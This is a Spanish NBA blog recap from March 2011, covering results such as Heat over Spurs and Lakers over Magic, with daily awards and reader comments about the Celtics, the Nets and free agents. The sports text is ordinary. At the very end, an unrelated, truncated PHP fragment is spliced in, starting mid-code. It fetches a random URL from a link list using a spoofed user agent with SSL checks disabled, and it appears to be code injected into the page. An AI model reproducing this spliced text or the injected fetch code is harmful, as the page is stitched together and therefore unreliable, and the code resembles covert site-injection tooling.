La Crónica (14/03/2011)

15 de March de 2011 por txusma

El “Zas! En toda la boca” continúa. Hace 10 días, después de caer precisamente por 30 puntos frente los Spurs, muchos poníamos en tela de juicio el proyecto de los Heat y hacíamos cábalas sobre los diferentes traspasos que debería llevar a cabo la franquicia. Hoy,  en cambio, nos levantamos con la tercera victoria consecutiva de Wade y compañía ante buenos rivales del Oeste como son Lakers, Grizzlies y Spurs. Y no victorias cualesquiera. A Memphis le endosaron 33 puntos de diferencia y anoche a los Spurs les devolvieron los 30 de hace unos días (80-110). ¿Ha cambiado algo en Miami? El plan sigue siendo el mismo pero con matices diferentes. Bosh ha mejorado sustancialmente y Wade parece haber dado un paso al frente para decir “este es mi equipo”. Y LeBron, que quiere ganar ante todo, no ha puesto problemas. Han ajustado los mecanismos justo a tiempo.

La victoria de Miami coincide con la hecatombe céltica. Derrota ante unos Nets que juegan con Sasha Vujacic de alero titular (79-88). Paul Pierce y Rajon Rondo estuvieron horribles en el tiro (3 de 20 entre ambos) y New Jersey lo aprovechó para conseguir su quinta victoria consecutiva. El sorprendente nivel de Kris Humphries y, como no podía ser de otra manera, la llegada de Deron Williams tienen buena culpa de ello.

Andrew Bynum es el principal culpable del gran estado de forma que atraviesan los Lakers. A pesar de que Kobe Bryant jugó tocado por la torcedura de tobillo frente Dallas, los amarillos se impusieron a Orlando (84-97) con una gran segunda parte. La batalla Howard-Bynum fue de otras épocas, con victoria amarilla gracias a una gran defensa sobre el de los Magic provocándole hasta 9 pérdidas, 6 más que todos los Lakers. A pesar de su derrota ante los Heat de hace unos días, no parece que haya equipo ahora mismo en la NBA que pueda mojar la oreja a estos Lakers.

También vivimos anoche un nuevo capítulo en la carrera por los últimos puestos de Playoffs del Oeste, y esta vez con interesantes duelos directos. Denver se impuso a New Orleans jugando buena parte del partido con Ty Lawson y Raymond Felton (114-103). Entre ambos repartieron alegría y 22 asistencias entre sus compañeros y volvieron locos a los jugadores de los Hornets. Chris Paul se marcó unos números antológicos. En Houston,  los Suns dieron la cara a pesar de la baja de Steve Nash y pudieron llevarse el partido en un último lanzamiento de Jared Dudley (93-95). Con esta victoria, los Rockets evitan perder definitivamente el tren, al igual que los Jazz, que vencieron a los Sixers en la prórroga en otro monstruoso partido de Al Jefferson (107-112). Por su parte, Memphis aguanta la posición sólidamente con una victoria frente los Clippers cimentada en la buena actuación de Zach Randolph (82-105). Probablemente, Blake Griffin jugó su peor partido desde que anda en la NBA. ¿Se le acaba la gasolina?

En el resto de partidos de la jornada, victoria de los Thunder frente los Wizards en el primer partido de Kendrick Perkins con su nueva camiseta (116-89) y victoria de Sacramento ante Golden State con partidazo de Marcus Thornton y Samuel Dalembert (119-129).

PREMIOS

MVP: Varios candidatos en el día de hoy con dobles figuras. Chris Bosh o Zach Randolph podrían merecerlo al anotar 30 puntos y capturar 12 rebotes cada uno. También los 42 puntos de Marcus Thornton. Pero la mejor aportación del día a la victoria de su equipo ha sido la de Al Jefferson, quien se marcó un 30-17-6 en la victoria de los Jazz tras prórroga ante los Sixers.

Rookie: Parece mentira que en un día en el que jueguen los Clippers no aparezca el nombre que está en mente de todos en esta sección. Hoy ni le nombraremos. Sí a su compañero Eric Bledsoe que crece día a día. 19 puntos anoche. Buena actuación de John Wall también, aunque el premio se lo lleva otro Wizard, Trevor Booker, por sus 14 puntos y 13 rebotes en el día de hoy.

Sorpresa: El ya mencionado Marcus Thornton se vuelve a quedar a las puertas de recibir otro prestigioso premio TJ. Permitan nuestra sorpresa ante la actuación de uno de los jugadores más limitados de toda la liga americana y gran parte de las demás ligas mundiales: Chuck Hayes. 21 puntos y 9 rebotes, estableciendo además su récord particular de anotación. Sombrerazo.

Decepción: La dupla Paul Pierce-Rajon Rondo se “sumó” para conseguir 9 puntos y un 3-20 en tiros con la consecuente derrota Celtic asociada. El premio sin embargo para Al Harrington: 0 puntos, 0 asistencias, 0 robos, 2 rebotes y 4 pérdidas. -7 de eficiencia. Lo increíble es que los Nuggets ganaran con semejante actuación.

Esfuerzo en vano: Candidato es Dwight Howard con su doble-doble en el Staples Center, pero hoy el oficioso “Premio Kevin Love” se lo queda Chris Paul, con sus 27 puntos, 15 asistencias, 5 rebotes y 7 robos.

Imágenes | AP Photos / Getty Images

Comenta

22 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Pues a mí me importa poco la victoria contra Orlando. Que haya jugado Kobe 30 minutos me parece una temeridad.

      Citar

  2. CAMPO2 dice:
    #2

    Alguien sabe el record victorias/derrotas de Boston desde que hicieron los traspasos?

      Citar

  3. TheDeerHunter dice:
    #3

    6-4 a favor
    aunque es un balance bastante chungo teniendo en cuenta los equipos contra los que se han enfrentado

      Citar

  4. CAMPO2 dice:
    #4

    Pues que espabilen y ajusten piezas aunque a la hora de la verdad son de los 2 o 3 equipos mas fiables de la NBA

      Citar

  5. Denise dice:
    #5

    Más que Bynum, yo creo que la clave fue Fisher, cuánto tiempo hacía que ese hombre no metía 15 puntos?
    A los Magic le faltó su otrora mejor arma, el banquillo, que asco de Gilbert Arenas, viendo los últimos traspasos de Jordan, ojala los Magic puedan encasquetar a Arenas en los Bobcats aunque fuese a cambio de cuatro gatos.
    También hay que decir que los Magic venían de jugar un partido 24 horas antes en Phoenix, si es que el calendario de la NBA está manipulado para que siempre gane el mismo, como el de la Liga Española…..XD,
    Yo creo que Kobe no tiene nada, no creo que sean tan tontos como para ponerlo a jugar para que se rompa definitivamente.
    No he visto ningún partido céltico post-Perkins, pero las ultimas derrotas creo que no tienen nada que ver con él, Glen Davis y Krstic no lo están haciendo mal.
    jjaja, otro zas en toda la boca, y los Spurs de capa caida. Me mojo aún más y entierro a los Spurs.
    En Semis, para casita y a finales de mayo Parker con la mujer de Barry en las Bahamas.
    Que pena que Denver no hubiese hecho el trade antes, le habrían ganado la Noroeste a los Thunder
    A pesar de las dos ultimas magnificas temporadas de Zach Randolph, no sería yo quien lo fichara para mi equipo. En cualquier momento se le puede ir la pinza.

      Citar

  6. sergio dice:
    #6

    Ayer ví el BOS-NJN y ORL-LAL.

    En el primer partido, los Nets parecieron el equipo unido y cohesionado que debería ser los verdes. Seis jugadores aportando, cada uno en determinados momentos y ninguno saliéndose demasiado del tiesto. En el tercer cuarto los Celtics lograron empatar el marcador gracias a la implicación de Davis y el acierto de Allen. Preocupante el bajón de juego que está dando Rondo en estos últimos partidos. Si sus estadísticas no han bajado demasiado, si lo ha hecho su impacto real en el juego. Es realmente desesperante verle tirar y ya ni penetra… Muy mal partido de él mismo, Pierce en el tiro y Jeff Green aunque lo intentó. Tambien me sorprendió ver a Rivers involucrando a todo el mundo y repartiendo minutos. Creo que está buscando la adaptación de todas las piezas nuevas antes de regreso de los O´neal.

    En el partido de California, aunque pareciese que en la primera mitad dominaron los Magic a mi no me pareció tal. Tuvieron bastante acierto en el primer tiempo (mucho mas que los amarillos) y sin embargo solo pudieron irse con 5 puntos de ventaja al descanso. Howard sólo dominó con Bynum en el banquillo y Gasol hasta los últimos cuartos no despertó.

      Citar

  7. MagicJohnson32 dice:
    #7

    Pues yo tengo claro que Bynum fue la clave no sólo anoche sino en la racha de 10-1 desde el All Star, donde los Lakers sólo han encajado más de 96 puntos una vez y fue tras una prórroga. Gasol está casi de espectador en defensa ante la hiperactividad de Bynum.

      Citar

  8. HeiNeKeN dice:
    #8

    El nivel de Humphries esta temporada esta siendo excelente y con la llegada de D-Will esta mejorando sus numeros más.

      Citar

  9. The wolf dice:
    #9

    aprovechando lo dicho por heineken queria preguntaros vuestra opinion sobre la situacion de deron y los nets a corto plazo….vamos este verano y quizas el tan esperado verano de 2012

      Citar

  10. Denise dice:
    #10

    Humphries este año está más ligero, por dentro está vacio (no hace falta decir por qué, todo el mundo lo sabe) entonces su cuerpo está más liviano y eso le hacer saltar más para tirar e ir al rebote. Esa es la clave, al margen de que juega en un equipo mediocre en el que tiene minutos y Johnson le ha dado un rol importante. Tampoco hay nada mejor en la zona de los Nets a parte de Brook Lopez.

    El futuro de los Nets lo veo como el Tunel de la Peste de Prokhorov ::: Negro.
    En primer lugar, no creo que ningun agente libre de los del 2012 vayan a ir a los Nets, es más, diría que el propio Deron Williams tiene ganas de pirarse de allí (y si Avery sigue de coach, aún más.)
    Si a ello le sumas que, en 2012 creo que tienen que renovar a Brook Lopez, que pedirá de 8 kilos en adelante, y que este año Humphries acaba contrato, y con la buena temporada que está haciendo también querrá un buen contrato, yo diría que en 2012, los Nets estarán luchando por la septima y octava plaza del Este….y gracias.

      Citar

  11. CAMPO2 dice:
    #11

    Si este verano los Nets traen un buen agente libre anotador que juegue de 2 o de 3 que no se si habra alguno, ya tendran con que motivar a D-Will, eso si tb tendrian que entrar en play-offs la temporada que viene con ciertas garantias, sino Deron se cambia de acera y se va a los Knicks

      Citar

  12. Txusma dice:
    #12

    Visto el nivel del Este, con Deron desde el principio de temporada a lo mejor los Nets se hubieran clasificado ya esta temporada.
    Agentes libres q les puedan interesar: Wilson Chandler, Caron Butler, JR Smith, Tayshaun Prince, Jason Richardson, Thaddeus Young, Michael Pietrus, Marcus Thorton, Andrei Kirilenko… No es una muy buena cosecha y varios son restringidos.

      Citar

  13. Denise dice:
    #13

    De esa lista de agentes libres faltan también Yao Ming, Glen Davis y Tony Parker, aunque el francés es incompatible con Deron. En definitiva, que ninguno de esos agentes libres dan un salto cualitativo para que los Nets dejen de ser unos “loosers”.
    Yo, de perdidos al rio, lo que haría sería fichar a Yao Ming!!, si, lo repito a Yao Ming, aprovechar el tirón mediático que le pueda quedar y rezar para que vuelva a un nivel digno. Y luego acertar con el top 5 que van a conseguir en este draft, porque con Favors da la sensación de que no acertaron.
    Ah, se me olvidaba lo más importante, echar a Avery Johnson.
    @txusma: Visto el nivel del Este, quizás hubieran alcanzado la octava plaza del Este, pero vamos, que aunque hayan ganado hoy en Boston, el 4-0 ó 4-1 en primera ronda no se lo quitaba nadie.

      Citar

  14. sergio dice:
    #14

    Pues no se… a mi un Thaddeus Young/Wilson Chandler + Pietrus/Tyshaun Prince me parecen un buen acompañamiento para D.Williams. Sumale a otros agentes libres como Diaw, Chandler, Afflalo, Battier, Brooks , Barnes, Z-Bo, Marc, Corey Brewer, Turiaf, Spencer Hawes, Jared Dudley, Landry, Barbosa, Al Thornton y no se si Noah o Horford (juraría que han renovado) y tienes grandísimos complementos a al base y pivot de primer nivel de los de Brooklyn.

    El problema de esta generación de agentes libres es que no quedan estrellas pero si muchísimos jugadores útiles. Preguntadle a Kantonyo por un 4 potente de este draft y veremos a ver como sale del verano el equipo del ruso.

      Citar

  15. sergio dice:
    #15

    Krstic, Jamal Crawford, Delonte West, Nene Hilario, Dragic, DeAndre Jordan, Mbah a Moute, David West, ……..

      Citar

  16. Scriers dice:
    #16

    Yo no entiendo lo de vacío y humpries. Recuerdo que en toronto me parecía un tío que siempre lo hacía bien.

      Citar

  17. Sempren dice:
    #17

    Scriers, busca en google quién es su novia 😛

      Citar

  18. Denise dice:
    #18

    Pero recordar que los Nets ya tienen comprometidos 38 kilos para el proximo año en Deron, Outlaw, Lopez, Petro, Morrow, Farmar y Damion James., y si el limite salarial anda por los 60 kilos…
    Es que poneis una lista como si pudiese fichar a 7 u 8 de los que habeis puesto, y como mucho podrá fichar a tres más la mid level, o incluso a menos, si quieren renovar a Humphries (que me da que va a pedir bastante).
    Yo creo que aunque fichara a tres de los mejores agentes libres de entre los que habeis puesto, no le da ni para pasar la primera ronda.
    Además, algunos creo que son restringidos como Afflalo, Young o Spencer Hawes; y otros como Matt Barnes que tiene una opción de seguir con los Lakers, o DeAndre Jordan, para el cual los Clippers tienen margen para renovarle, deben estar muy locos para abandonar los exitosos proyectos de Lakers y Clippers, y embarcarse en un proyecto incógnita como el de los Nets.

    Si, lo de que Humphries está vacio por dentro, iba por la Kardashian, el epidimio lo tendrá regastado 🙂

      Citar

  19. CAMPO2 dice:
    #19

    a mi Wilson Chandler me encanta y JR Smith si le hacen una lobotomia y lo convierten en una persona normal con un cerebro de nivel medio es muy valido, eso si habria que colocar a Outlaw por algun sitio.

    No sabia que The Machine acabase contrato, no voy a poder dormir de pensar n donde acabara

      Citar

  20. Jabho dice:
    #20

    Completamente de acuerdo conque el problema de los Celtics es el nivel de Rondo actualmente y quizás un exceso en el reparto de minutos… pero es lo que toca ahora mismo.

    Lo importante es que los jugadores lleguen finos a PO y si para eso hay que palmar algunos partidos no queda otra. Lo importante no es tanto conservar la ventaja con los Bulls sino contra los Lakers (contra los Spurs en caso de que sean estos los que lleguen esta perdida de todas todas)

      Citar

  21. Len Bias dice:
    #21

    De 40 canastas de Denver 15 las metieron Felton y Lawson, y 22 las regalaron. Sólo en 3 canastas no participaron, curioso…

      Citar

  22. GreenPride dice:
    #22

    Los Celtics han llegado a ese estado de bajón post-traspaso que yo particularmente esperaba. Es difícil adaptar a medio equipo nuevo con tan poco tiempo. Lo malo es que esto ha afectado y parece que mucho a Rondo que es el que mueve los hilos del equipo. Sus últimos malos partidos coinciden con esta racha de derrotas de los verdes que como no espabilen pueden echar por tierra su gran regular season hasta estos últimos partidos. De momento los Bulls les empatan y si siguen perdiendo cuidado con la ventaja campo también ante los Heat.
    Estos Heat que tras la hecatombe parecen haber despertado. Muy buen Chris Bosh en los últimos partidos mucho más agresivo tanto en defensa como en ataque buscando la canasta y jugando muchos más pick and rolls y mucho menos LeBron sistema o Wade sistema. Y claro en cuanto empiezan a jugar más en equipo y con algo de juego interior pues van para arriba, aunque ganar de 30 a Memphis y San Antonio seguidos no es moco de pavo. Veremos si este es el resurgir definitivo de los Heat de cara a playoffs y si les da para hacer peligrar los records de Celtics y Bulls.
    Por su parte los Lakers de mano de un enorme Bynum siguen defendiendo fenomenal y eso unido a su calidad en ataque y a su altura que dificulta a todos los rivales les mandan para arriba como los cohetes. Para mí el equipo más enforma seguro en estos momentos y ya claramente máximos aspirantes otra vez al anillo, con la única duda de si podrán ganar este año con posiblemente varias eliminatorias sin el factor cancha a favor

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>